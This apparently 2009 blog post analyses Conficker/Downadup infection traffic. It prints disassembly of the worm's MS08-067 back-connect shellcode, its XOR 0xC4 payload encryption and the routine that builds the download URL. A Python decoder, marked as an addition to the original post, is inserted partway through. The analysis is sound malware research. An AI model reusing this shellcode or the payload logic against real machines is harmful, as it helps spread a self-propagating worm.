Thursday, January 1, 2009

Analyzing the Infection Traffic of a Downadup/Conficker/Kido Variant

While analyzing the variant of Downadup/Conficker/Kido, I set up my analysis lab to see exactly how it attacks other machines in the LAN. So, I infected the test machine "IP 192.168.1.7" and then ran a sniffer like Wireshark. As you can see in the following image, on successful connection to port 445 (SMB) of 192.168.1.6, it tries to send a "NetPathCanonicalize" request via the SRVSVC service (MS08-067 vulnerability). See packet 113 in figure 1 (left-hand side).



I found that after infecting the machine, it creates a local HTTP server (random port) to distribute the malware. To infect another machine, it sends the same URL to the victims. But you cannot see that request in the packets' "Path Query" of the "NetPathCanonicalize request" as it is encrypted!!! How did I come to know...

Answer -->> There is a decryption routine in this packet itself. See figure 2 (left-hand side); this is the data of packet 113.



The decoding routine is:

seg000:008899FA loc_8899FA:
seg000:008899FA 80 31 C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 66 81 39 4D 53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75 F5 jnz short loc_8899FA


It means the payload is encrypted with "XOR 0xC4". This code decrypts the data by XORing each byte with 0xC4 until the word 0x534D (the bytes 4D 53, i.e. "MS") is reached. So, here it is, see figure 3 (left-hand side):




Here you can see clearly that this is back-connect shellcode. So its infection method is:


1. It exploits the vulnerability.

2. Successful exploitation results in execution of the payload.

3. The payload tells the other machine to connect to the "already infected" machine using a URL of this form:

"http://[infectedPC ip]:port/[random]". Here in my case it is "http://192.168.1.7:6216/ewflztq".

The infected machine had already opened the random port 6216 to spread the malware. The string "ewflztq" is randomly generated for a particular session. From that location the victim downloads a copy of the malware and executes it.
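As an added example (not from the original post), here is a Python decoder that replays the shellcode loop shown above: XOR each byte with 0xC4, then stop as soon as the raw word at the new position is 0x534D ("MS"), and finally pull the http://ip:port/random string out of the decoded bytes. The packet data itself only exists in the figure, so the input blob is constructed here from the URL seen in the capture; the decoder also reports the case where the terminator never appears, which the real loop does not handle.

```python
import re

XOR_KEY = 0xC4          # single-byte key from the shellcode decoder loop
TERMINATOR = b"MS"      # cmp word ptr [ecx], 534Dh -> bytes 4D 53 in memory


def decode_payload(blob, start=0):
    """Replay the decoder loop: XOR the byte at the current position,
    advance one byte, and stop when the raw (not yet decoded) word at the
    new position is 0x534D ("MS"). Returns the decoded bytes from `start`
    up to the terminator. Note the terminator is checked on raw bytes, so
    plaintext 89 97 (which encodes to 4D 53) would stop decoding early."""
    buf = bytearray(blob)
    i = start
    while True:
        if i >= len(buf):
            raise ValueError("terminator 0x534D ('MS') not found; truncated payload")
        buf[i] ^= XOR_KEY
        i += 1
        if buf[i:i + 2] == TERMINATOR:
            return bytes(buf[start:i])


URL_RE = re.compile(rb"http://\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}/[A-Za-z0-9]+")


def extract_download_url(decoded):
    """Pull the http://<ip>:<port>/<random> string the payload carries."""
    m = URL_RE.search(decoded)
    return m.group(0).decode("ascii") if m else None


def encode_like_sample(plain):
    """Constructed helper to build test input in the layout described on
    the page: XOR 0xC4 over the data, then a plaintext "MS\\0" terminator."""
    return bytes(b ^ XOR_KEY for b in plain) + TERMINATOR + b"\x00"


# Constructed sample: filler bytes followed by the URL seen in the capture.
SAMPLE_PLAIN = b"\x90" * 8 + b"http://192.168.1.7:6216/ewflztq\x00"
SAMPLE_BLOB = encode_like_sample(SAMPLE_PLAIN)

if __name__ == "__main__":
    decoded = decode_payload(SAMPLE_BLOB)
    print(decoded)
    print(extract_download_url(decoded))
```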

I verified the same thing in the code of the malware specimen; see below:
seg000:0087966F 50 push eax ; _DWORD
seg000:00879670 68 B4 3F 87 00 push offset aHttpD_D_D_DDS ; “http://%d.%d.%d.%d:%d/%s”
seg000:00879675 8D 45 80 lea eax, [ebp+var_80]
seg000:00879678 68 80 00 00 00 push 80h ; _DWORD
seg000:0087967D 50 push eax ; _DWORD
seg000:0087967E FF 15 B8 12 87 00 call ds:MSVCRT_snprintf
seg000:00879684 8D 45 80 lea eax, [ebp+var_80]
seg000:00879687 50 push eax
seg000:00879688 C6 45 FF 00 mov [ebp+var_1], 0
seg000:0087968C E8 2F D9 00 00 call j_MSVCRT_strlen
seg000:00879691 83 C4 28 add esp, 28h
seg000:00879694 05 BE 00 00 00 add eax, 0BEh
seg000:00879699 50 push eax
seg000:0087969A 6A 40 push 40h
seg000:0087969C FF 15 C4 10 87 00 call ds:GlobalAlloc
seg000:008796A2 85 C0 test eax, eax
seg000:008796A4 8B 75 08 mov esi, [ebp+arg_0]
seg000:008796A7 89 06 mov [esi], eax
seg000:008796A9 0F 84 84 00 00 00 jz loc_879733
seg000:008796AF 53 push ebx
seg000:008796B0 57 push edi
seg000:008796B1 BF B9 00 00 00 mov edi, 0B9h
seg000:008796B6 57 push edi
seg000:008796B7 68 F0 99 88 00 push offset Exploit_PayLoad_BackConnect
seg000:008796BC 50 push eax
seg000:008796BD E8 10 D9 00 00 call j_MSVCRT_memcpy

Encryption Loop
seg000:008796F5 Do_Crypt_Payload: ;
seg000:008796F5 8B 06 mov eax, [esi]
seg000:008796F7 03 C7 add eax, edi
seg000:008796F9 80 30 C4 xor byte ptr [eax], 0C4h
seg000:008796FC 8D 45 80 lea eax, [ebp+var_80]
seg000:008796FF 50 push eax
seg000:00879700 47 inc edi
seg000:00879701 E8 BA D8 00 00 call j_MSVCRT_strlen
seg000:00879706 03 C3 add eax, ebx
seg000:00879708 3B F8 cmp edi, eax
seg000:0087970A 59 pop ecx
seg000:0087970B 72 E8 jb short Do_Crypt_Payload
seg000:0087970D
seg000:0087970D loc_87970D:
seg000:0087970D 8B 06 mov eax, [esi]
seg000:0087970F C6 04 07 4D mov byte ptr [edi+eax], 4Dh
seg000:00879713 8B 06 mov eax, [esi]
seg000:00879715 C6 44 38 01 53 mov byte ptr [eax+edi+1], 53h
seg000:0087971A 8B 06 mov eax, [esi]
seg000:0087971C C6 44 38 02 00 mov byte ptr [eax+edi+2], 0

And the payload is:

Exploit_PayLoad_BackConnect: ;
seg000:008899F0
seg000:008899F0 E8 FF FF FF FF call near ptr Exploit_PayLoad_BackConnect+4
seg000:008899F0 ; ---------------------------------------------------------------------------
seg000:008899F5 C2 db 0C2h ; -
seg000:008899F6 ; ---------------------------------------------------------------------------
seg000:008899F6 5F pop edi
seg000:008899F7 8D 4F 10 lea ecx, [edi+10h]
seg000:008899FA
seg000:008899FA loc_8899FA:
seg000:008899FA 80 31 C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 66 81 39 4D 53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75 F5 jnz short loc_8899FA
seg000:00889A05 FC cld
seg000:00889A06 6A 02 push 2
seg000:00889A08 59 pop ecx
seg000:00889A09 64 8B 41 2E mov eax, fs:[ecx+2Eh]
seg000:00889A0D 8B 40 0C mov eax, [eax+0Ch]
seg000:00889A10 8B 40 1C mov eax, [eax+1Ch]
seg000:00889A13 8B 00 mov eax, [eax]
seg000:00889A15 8B 58 08 mov ebx, [eax+8]
seg000:00889A18 8D B7 A1 00 00 00 lea esi, [edi+0A1h]